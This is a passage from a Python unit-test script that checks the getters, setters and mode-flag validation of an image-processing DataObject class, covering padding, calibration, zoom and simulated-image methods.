print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(slicesExp, slicesOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getSliceList with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
slices = data.getSliceList()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setMeanCalibrationFactor")
print("Test setMeanCalibrationFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
meanExp = 450.0
data.setMeanCalibrationFactor(meanExp)
meanOut = data.getMeanCalibrationFactor()
if(meanExp == meanOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(meanExp, meanOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setMeanCalibrationFactor with non-float input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setMeanCalibrationFactor("NotAFloat")
print("FAILURE-No error occurred")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setMeanCalibrationFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setMeanCalibrationFactor(2.5)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test getMeanCalibrationFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
cal = data.getMeanCalibrationFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setPhotoplotImage")
print("Test setPhotoplotImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
figure = plt.figure()
data.setPhotoplotImage(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPhotoplotImage with incorrect type")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setPhotoplotImage("Not a matplotlib.figure.Figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setPhotoplotImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
figure = plt.figure()
data.setPhotoplotImage(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPhotoplotImage")
print("Test getPhotoplotImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
photoImgExp = plt.figure()
data.setPhotoplotImage(photoImgExp)
photoImgOut = data.getPhotoplotImage()
if(photoImgExp == photoImgOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(photoImgExp, photoImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPhotoplotImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
photoImg = data.getPhotoplotImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Publication functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setAnnotatedImage")
print("Test setAnnotatedImage with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
figure = plt.figure()
data.setAnnotatedImage(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setAnnotatedImage with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setAnnotatedImage("Not a pyplot figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error")
failures = failures + 1
print("Test setAnnotatedImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
figure = plt.figure()
data.setAnnotatedImage(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getAnnotatedImage")
print("Test getAnnotatedImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
figureExp = plt.figure()
data.setAnnotatedImage(figureExp)
figureOut = data.getAnnotatedImage()
if(figureExp == figureOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getAnnotatedImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
fig = data.getAnnotatedImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test CheckPixels functions
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setCheckX")
print("Test setCheckX with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX(1)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckX(-1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidCoordException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckX with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckX(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckX with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkXExp = 10
data.setCheckX(checkXExp)
checkXOut = data.getCheckX()
if(checkXExp == checkXOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkXExp, checkXOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckX with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
checkX = data.getCheckX()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCheckY")
print("Test setCheckY with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY(10)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckY(-1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidCoordException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckY with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckY(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckY")
print("Test getCheckY with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkYExp = 100
data.setCheckY(checkYExp)
checkYOut = data.getCheckY()
if(checkYExp == checkYOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkYExp, checkYOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckY with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
checkY = data.getCheckY()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing function with multiple tests
print("Test setCheckFactor")
print("Test setCheckFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor(float(1.0))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor("Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
data.setCheckFactor(float(-0.1))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidZoomFactorException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCheckFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setCheckFactor(float(1.0))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCheckFactor")
print("Test getCheckFactor with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
checkFactorExp = float(2.5)
data.setCheckFactor(checkFactorExp)
checkFactorOut = data.getCheckFactor()
if(checkFactorExp == checkFactorOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(checkFactorExp, checkFactorOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCheckFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
zoomFactor = data.getCheckFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setPixelImage")
print("Test setPixelImage with valid inputs")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
valid = plt.figure()
data.setPixelImage(valid)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPixelImage with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPixelImage(1)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setPixelImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
valid = plt.figure()
data.setPixelImage(valid)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getPixelImage")
print("Test getPixelImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels',validsnr)
pixImgExp = plt.figure()
data.setPixelImage(pixImgExp)
pixImgOut = data.getPixelImage()
if(pixImgExp == pixImgOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(pixImgExp, pixImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPixelImage with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
pixImg = data.getPixelImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadTop")
print("Test setPadTop with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadTop(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadTop with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadTop("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadTop with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadTop(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadTop")
print("Test getPadTop with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padTopExp = 25
data.setPadTop(padTopExp)
padTopOut = data.getPadTop()
if(padTopExp == padTopOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padTopExp, padTopOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadTop with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadTop()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadBottom")
print("Test setPadBottom with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadBottom(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadBottom with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadBottom("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadBottom with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadBottom(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadBottom")
print("Test getPadBottom with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padBottomExp = 25
data.setPadBottom(padBottomExp)
padBottomOut = data.getPadBottom()
if(padBottomExp == padBottomOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padBottomExp, padBottomOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadBottom with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadBottom()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadLeft")
print("Test setPadLeft with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadLeft(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadLeft with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadLeft("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadLeft with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadLeft(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadLeft")
print("Test getPadLeft with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padLeftExp = 25
data.setPadLeft(padLeftExp)
padLeftOut = data.getPadLeft()
if(padLeftExp == padLeftOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padLeftExp, padLeftOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadLeft with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadLeft()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadRight")
print("Test setPadRight with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadRight(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadRight with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadRight("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadRight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadRight(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadRight")
print("Test getPadRight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padRightExp = 25
data.setPadRight(padRightExp)
padRightOut = data.getPadRight()
if(padRightExp == padRightOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padRightExp, padRightOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadRight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadRight()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setHeight")
print("Test setHeight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setHeight(15)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setHeight with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setHeight("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setHeight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setHeight(15)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getHeight")
print("Test getHeight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
heightExp = 15
data.setHeight(heightExp)
heightOut = data.getHeight()
if(heightExp == heightOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(heightExp, heightOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getHeight with invaid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getHeight()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setWidth")
print("Test setWidth with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setWidth(15)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setWidth with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setWidth("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setWidth with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setWidth(15)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getWidth")
print("Test getWidth with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
widthExp = 15
data.setWidth(widthExp)
widthOut = data.getWidth()
if(widthExp == widthOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(widthExp, widthOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getWidth with invaid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getWidth()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Simulate functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSimulateImage")
print("Test setSimulateImage with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
correctField = data.getImageData16()
data.setSimulateImage(correctField)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSimulate image with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setSimulateImage("Not a numpy.ndarray")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSimulateImage with wrong number of dimensions")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
onlyonedim = np.array([1,2,3]).astype(np.int16)
data.setSimulateImage(onlyonedim)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSimulateImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
correctField0 = np.array([1,2,3]).astype(np.int16)
correctField1 = np.array([4,5,6]).astype(np.int16)
correctField = (correctField0, correctField1)
data.setSimulateImage(correctField)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getSimulateImage")
print("Test getSimulateImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
simulateExp = data.getImageData16()
data.setSimulateImage(simulateExp)
simulateOut = data.getSimulateImage()
comparison = (simulateExp == simulateOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getSimulateImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.getSimulateImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Zoom Functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setZoomFactor")
print("Test setZoomFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor(float(1.0))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor("Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid value")
try:
tests = tests + 1
